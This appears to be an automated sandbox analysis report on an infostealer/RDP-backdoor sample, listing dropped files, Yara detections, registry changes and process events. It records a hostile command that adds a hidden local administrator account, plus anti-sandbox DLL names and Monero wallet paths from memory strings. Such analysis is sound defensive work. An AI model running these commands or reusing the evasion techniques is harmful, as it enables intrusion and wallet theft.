Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000000A.00000002.2990922258.00000000201E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2981605260.000000001A27D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3299573060.000000002012B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.4.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: userBGIJEGCGDG.exe, 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\rje\tg\fk\obj\Release\ojc.pdb source: file.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: userBGIJEGCGDG.exe.4.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 18.0.userBGIJEGCGDG.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2939917338.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: userBGIJEGCGDG.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GIEBGIIJDG.exe PID: 1084, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\GIEBGIIJDG.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\userBGIJEGCGDG.exe, type: DROPPED

Source: userBGIJEGCGDG.exe.4.dr

Static PE information: 0xC8160FB5 [Sat May 16 21:10:13 2076 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00419860

Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.4.dr	Static PE information: section name: .didat
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.4.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041B035 push ecx; ret	4_2_0041B048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2DB536 push ecx; ret	4_2_6C2DB549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042F142 push ecx; ret	10_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00422D3B push esi; ret	10_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041DDB5 push ecx; ret	10_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00432715 push 0000004Ch; iretd	10_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD10C8 push ecx; ret	10_2_201D3552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD1BF9 push ecx; ret	10_2_20174C03

Source: file.exe	Static PE information: section name: .text entropy: 7.994047984273234
Source: userAFHDHCAAKE.exe.4.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5db9e54794_vfkagks[1].exe.4.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: userGCAEHDBAAE.exe.4.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.4.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: userBGIJEGCGDG.exe.4.dr	Static PE information: section name: .text entropy: 7.77601245760385
Source: 66f5d9ab0d4c7_rdp[1].exe.4.dr	Static PE information: section name: .text entropy: 7.77601245760385

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_615fbfde /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKJJEBKKEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKFHCGIDBA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIEBGIIJDG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\userBGIJEGCGDG.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userAFHDHCAAKE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userBGIJEGCGDG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userGCAEHDBAAE.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKJJEBKKEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKFHCGIDBA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIEBGIIJDG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Windows\System32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00419860

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGCAEHDBAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBGIJEGCGDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKFHCGIDBA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJJEBKKEH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GIEBGIIJDG.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.userAFHDHCAAKE.exe.3945570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: userAFHDHCAAKE.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 528, type: MEMORYSTR

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_4-85056

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory allocated: 2720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory allocated: 4940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch
Source: C:\Users\userGCAEHDBAAE.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\userGCAEHDBAAE.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch
Source: C:\Users\userBGIJEGCGDG.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Users\userBGIJEGCGDG.exe	Memory allocated: 2B00000 memory reserve \| memory write watch
Source: C:\Users\userBGIJEGCGDG.exe	Memory allocated: 4B00000 memory reserve \| memory write watch
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory allocated: 12D0000 memory reserve \| memory write watch
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory allocated: 4FA0000 memory reserve \| memory write watch
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory allocated: 1440000 memory reserve \| memory write watch
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory allocated: 1440000 memory reserve \| memory write watch
